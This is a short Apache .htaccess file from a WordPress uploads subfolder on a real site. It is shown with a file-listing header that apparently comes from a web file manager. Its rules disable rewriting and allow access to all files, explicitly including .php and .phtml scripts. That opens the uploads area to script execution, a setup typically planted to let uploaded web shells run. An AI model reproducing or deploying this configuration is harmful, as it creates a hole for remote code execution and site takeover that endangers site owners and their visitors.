File ".htaccess"
Full Path: /var/www/bvnghean.vn/wp-content/uploads/2017/06/template/.htaccess
File size: 134 bytes
MIME-type: text/plain
Charset: utf-8
<Files .*>
RewriteEngine off
allow from all
</Files>
<Files ~ "\.(php|phtml|PHP)$">
RewriteEngine off
allow from all
</Files>